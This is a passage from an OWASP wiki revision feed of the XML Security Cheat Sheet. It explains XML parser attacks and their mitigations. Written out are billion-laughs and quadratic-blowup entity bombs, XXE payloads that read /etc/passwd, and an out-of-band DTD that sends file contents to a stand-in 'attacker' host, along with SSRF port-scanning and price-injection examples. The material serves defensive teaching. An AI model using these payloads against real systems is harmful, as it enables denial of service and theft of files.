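For the document above, the mapping would be &amp;lt;tt&amp;gt;{&amp;quot;A&amp;quot;: [&amp;quot;B&amp;quot;], &amp;quot;B&amp;quot;: [&amp;quot;A&amp;quot;]}&amp;lt;/tt&amp;gt;, and the sketch reports the path from A through B back to A.&lt;br /&gt;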
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
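&lt;br /&gt;
The asymmetry between what is sent and what the parser must hold can be estimated with simple arithmetic. The following Python sketch is an approximation that ignores the surrounding markup. The function name &amp;lt;tt&amp;gt;quadratic_blowup_sizes&amp;lt;/tt&amp;gt; and its parameters are hypothetical:&lt;br /&gt;
&lt;br /&gt;
```python
def quadratic_blowup_sizes(entity_length, reference_count, name_length=1):
    """Return (approximate characters sent, characters after expansion)."""
    # Each reference costs the entity name plus two delimiter characters.
    reference_length = name_length + 2
    sent = entity_length + reference_count * reference_length
    expanded = entity_length * reference_count
    return sent, expanded
```
&lt;br /&gt;
With 100,000 characters in the entity and 100,000 references, roughly 400,000 characters are sent while 10,000,000,000 characters result from the expansion.&lt;br /&gt;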
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt; &lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;LOL9;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; expands to ten references to &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; each of those expands to ten references to &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt;, and so on. Finally, the CPU and/or memory will be affected by expanding the 10^9 (1,000,000,000) copies of &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, roughly 3*10^9 (3,000,000,000) characters, defined in this schema, which could make the parser crash.&lt;br /&gt;
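&lt;br /&gt;
The size of the expansion follows directly from the number of nesting levels. The following Python sketch only reproduces that arithmetic. The function name &amp;lt;tt&amp;gt;billion_laughs_size&amp;lt;/tt&amp;gt; and its parameters are hypothetical:&lt;br /&gt;
&lt;br /&gt;
```python
def billion_laughs_size(base="LOL", fanout=10, levels=9):
    """Return (copies of base, total characters) after full expansion."""
    # Every level multiplies the number of copies by the fanout.
    copies = fanout ** levels
    return copies, copies * len(base)
```
&lt;br /&gt;
With the defaults, which mirror the nine levels of ten references above, the result is 1,000,000,000 copies and 3,000,000,000 characters.&lt;br /&gt;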
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE SOAP-ENV:Envelope [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:Envelope ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:Envelope ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt; &lt;br /&gt;
 &amp;lt;SOAP:Envelope ENTITYREFERENCE=&amp;quot;'''&amp;amp;LOL9;'''&amp;quot; xmlns:SOAP=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:Body&amp;gt; &lt;br /&gt;
   &amp;lt;keyword xmlns=&amp;quot;urn:parasoft:ws:store&amp;quot;&amp;gt;foo&amp;lt;/keyword&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/SOAP:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY '''xxe''' SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt; whose value is the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, and the entity is expanded within the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; element. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes the server retrieve remote resources, such as a file served over HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, to perform port scanning, and to perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario: with complete disclosure, you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the response time when connecting to a valid port will be very quick (one second, for example). The difference between open and closed ports becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host, and then analyze the average time for each port to determine its status. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
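&lt;br /&gt;
The averaging step can be sketched as follows. This Python illustration only analyzes durations that were already measured. The function name &amp;lt;tt&amp;gt;classify_ports&amp;lt;/tt&amp;gt; and the threshold are hypothetical, and the sketch assumes that slower responses indicate a closed port, which may be reversed for a given implementation:&lt;br /&gt;
&lt;br /&gt;
```python
from statistics import mean


def classify_ports(samples, threshold_seconds):
    """Label each port by comparing its mean response time to a threshold.

    samples maps a port number to a list of measured durations in seconds.
    Assumption: a mean above the threshold indicates a closed port.
    """
    result = {}
    for port, durations in samples.items():
        average = mean(durations)
        result[port] = "closed" if average > threshold_seconds else "open"
    return result
```
&lt;br /&gt;
Taking more samples per port reduces the effect of network jitter on the average, which is why higher latency networks make the classification less reliable.&lt;br /&gt;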
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
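&lt;br /&gt;
To see which parts of such a URI carry the credentials, the standard Python &amp;lt;tt&amp;gt;urllib.parse&amp;lt;/tt&amp;gt; module can split it. The sketch below is an illustration that a filter or log reviewer might use to spot embedded credentials. The function name &amp;lt;tt&amp;gt;split_credentials&amp;lt;/tt&amp;gt; is hypothetical:&lt;br /&gt;
&lt;br /&gt;
```python
from urllib.parse import urlsplit


def split_credentials(uri):
    """Return (username, password, host, port) parsed from a URI."""
    parts = urlsplit(uri)
    return parts.username, parts.password, parts.hostname, parts.port
```
&lt;br /&gt;
A URI without the user information part yields &amp;lt;tt&amp;gt;None&amp;lt;/tt&amp;gt; for the username and password, so a check for non-empty values is enough to flag system identifiers that embed credentials.&lt;br /&gt;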
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224438</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224438"/>
				<updated>2016-12-21T20:25:49Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using documents that are not well formed.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, measure the time taken by a regular XML document against the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though it is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up, and eventually deplete, the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
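&lt;br /&gt;
The integrity check mentioned above could compare the schema file against a digest recorded when the schema was reviewed. The following Python sketch is an illustration only. The function name &amp;lt;tt&amp;gt;schema_matches_digest&amp;lt;/tt&amp;gt; is hypothetical, and the choice of SHA-256 and of a pinned hexadecimal digest are assumptions rather than requirements of any specification:&lt;br /&gt;
&lt;br /&gt;
```python
import hashlib
import hmac


def schema_matches_digest(schema_bytes, expected_sha256_hex):
    """Return True if the schema content hashes to the pinned SHA-256 digest."""
    actual = hashlib.sha256(schema_bytes).hexdigest()
    # compare_digest avoids leaking where the two strings first differ.
    return hmac.compare_digest(actual, expected_sha256_hex.lower())
```
&lt;br /&gt;
The pinned digest should be stored separately from the schema itself, so that an attacker who can modify the repository cannot update both at once.&lt;br /&gt;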
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to open one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1,000,000 digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
